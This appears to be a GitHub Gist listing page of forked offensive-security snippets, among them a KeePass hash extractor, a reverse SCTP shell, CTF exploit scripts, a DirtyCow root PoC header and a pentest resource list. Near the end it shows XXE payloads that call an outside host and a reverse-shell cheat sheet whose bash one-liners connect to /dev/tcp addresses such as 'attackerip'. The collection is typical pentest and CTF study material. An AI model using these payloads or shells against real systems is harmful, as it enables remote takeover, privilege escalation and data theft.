@waywardsun
waywardsun / keepass2john.py
Created Dec 21, 2017 — forked from HarmJ0y/keepass2john.py
Python port of John the Ripper's keepass2john - extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases
#!/usr/bin/python
# Python port of keepass2john from the John the Ripper suite (http://www.openwall.com/john/)
# ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at gmail.com> in March of 2012
# ./keepass2john.c was released under the GNU General Public License
# source keepass2john.c source code from: http://fossies.org/linux/john/src/keepass2john.c
#
# Python port by @harmj0y, GNU General Public License
#
waywardsun / reverse_sctp_shell.c
Created Aug 11, 2017 — forked from 0xabe-io/reverse_sctp_shell.c
Simple C code to create a reverse shell over SCTP
// server: ncat -v --sctp -l PORT_NUM
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <string.h>
waywardsun / pwn.py
Created Jun 19, 2017 — forked from saelo/pwn.py
Solution for "assignment" of GoogleCTF 2017
#!/usr/bin/env python3
#
# Exploit for "assignment" of GoogleCTF 2017
#
# CTF-quality exploit...
#
# Slightly simplified and shortened explanation:
#
# The bug is a UAF of one or both values during add_assign() if a GC is
# triggered during allocate_value(). The exploit first abuses this to leak a
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
waywardsun / toilet-exploit.py
Created Jun 1, 2017 — forked from m1ghtym0/toilet-exploit.py
POC exploit for toilet service of FAUST-CTF-2017
#!/usr/bin/env python2
from pwn import *
from re import findall
from random import choice, randint
from string import digits, ascii_uppercase
from hashlib import sha256
from sys import argv, exit
MAX_NAME_LEN = 64
waywardsun / offsec.md
Created May 17, 2017 — forked from trietptm/offsec.md
Penetration Testing/Assessment Workflow

Penetration Testing/Assessment Workflow & other fun infosec stuff

https://github.com/jivoi/pentest

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tips and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

View gist:84496cb1e4eeab23e421a6a0af60a3fa
my slides:
https://github.com/galvanic/talk-slides/blob/master/scapy.ipynb
official docs:
http://www.secdev.org/projects/scapy/demo.html
http://www.secdev.org/projects/scapy/doc/usage.html#sniffing
some tutorials from the internet:
https://theitgeekchronicles.files.wordpress.com/2012/05/scapyguide1.pdf
https://samsclass.info/124/proj11/proj17-scapy.html
waywardsun / cowroot.c
Created Oct 21, 2016 — forked from rverton/cowroot.c
CVE-2016-5195 (DirtyCow) Local Root PoC
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
View reverse_shells
#bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
#bash alt
exec /bin/bash 0&0 2>&0
#bash alt 2
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
#bash alt 3